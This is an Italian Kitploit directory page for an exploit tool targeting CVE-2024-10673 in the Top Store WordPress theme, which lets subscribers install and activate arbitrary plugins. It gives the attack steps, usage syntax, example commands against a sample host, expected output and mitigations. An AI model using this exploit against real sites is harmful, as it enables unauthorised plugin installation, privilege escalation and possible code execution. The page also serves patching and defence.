Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/nxploited/cve-2024-10673
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubnxploited/cve-2024-10673

CVE-2024-10673

Top Store <= 1.5.4 - Installazione/Attivazione Arbitraria di Plugin (Autenticato, Subscriber+)

Vedi Repository
111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔥 Panoramica

Questo script sfrutta CVE-2024-10673, una vulnerabilità critica presente nel Top Store WordPress Theme (<= 1.5.4). La falla consente a utenti autenticati con accesso a livello di abbonato o superiore di installare e attivare plugin arbitrari tramite richieste AJAX non protette.

⚠️ Gravità e impatto

  • Installazione di plugin non autorizzata: gli attaccanti con privilegi di abbonato possono installare plugin senza l'approvazione dell'amministratore.
  • Possibilità di esecuzione di codice remoto (RCE): se viene installato un plugin dannoso, gli attaccanti possono eseguire codice arbitrario.
  • Escalation dei privilegi: gli attaccanti possono installare plugin che garantiscono loro accesso amministrativo.

🛠️ Caratteristiche di questo exploit

  • Automatizza l'attacco estraendo dinamicamente il nonce richiesto.
  • Consente la selezione del plugin (gli utenti possono specificare quale plugin installare e attivare).
  • Supporta risposte in formato JSON per una registrazione strutturata.
  • Gestisce gli errori in modo elegante, garantendo un'esecuzione affidabile.

⚡ Come funziona l'exploit

  1. Accedi a WordPress utilizzando credenziali valide.
  2. Estrai il nonce AJAX da themes.php?page=thunk_started.
  3. Invia una richiesta AJAX per installare un plugin (predefinito: hunk-companion o plugin definito dall'utente).
  4. Invia un'altra richiesta per attivare il plugin.
  5. Restituisce risposte JSON che indicano successo o fallimento.

🚀 Utilizzo

root@kitploit:~
usage: u.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]

Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password
  -pl PLUGIN, --plugin PLUGIN
                        Plugin slug to install and activate (default: hunk-companion)

Esempi

  • Installa e attiva il plugin predefinito (hunk-companion):
    root@kitploit:~
    python exploit.py -u http://192.168.100.74:888/wordpress -un admin -p admin
    
  • Installa e attiva un plugin specifico (woocommerce):
    root@kitploit:~
    python CVE-2024-10673.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl woocommerce
    

📝 Output previsto

root@kitploit:~
{"Logged in successfully"}
{"Fetching nonce value..."}
{"Nonce extracted": "abc123"}
{"Installing plugin: woocommerce..."}
{"Plugin woocommerce installed successfully"}
{"Activating plugin: woocommerce..."}
{"Plugin woocommerce activated successfully"}
{"Exploit completed successfully!"}

🔒 Mitigazione

Per proteggere il tuo sito WordPress:

  • Aggiorna a una versione corretta del tema Top Store.
  • Limita i permessi degli abbonati per prevenire accessi non necessari.
  • Monitora i plugin installati per rilevare modifiche non autorizzate.
  • Disabilita l'installazione dei plugin per i non amministratori.

⚠️ Disclaimer

Questo script è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza. L'uso non autorizzato contro sistemi di cui non si possiede la proprietà o per i quali non si ha un esplicito permesso di test è illegale. Usalo in modo responsabile!

Di: Khaled Alenazi (Nxploit)

Scarica lo strumento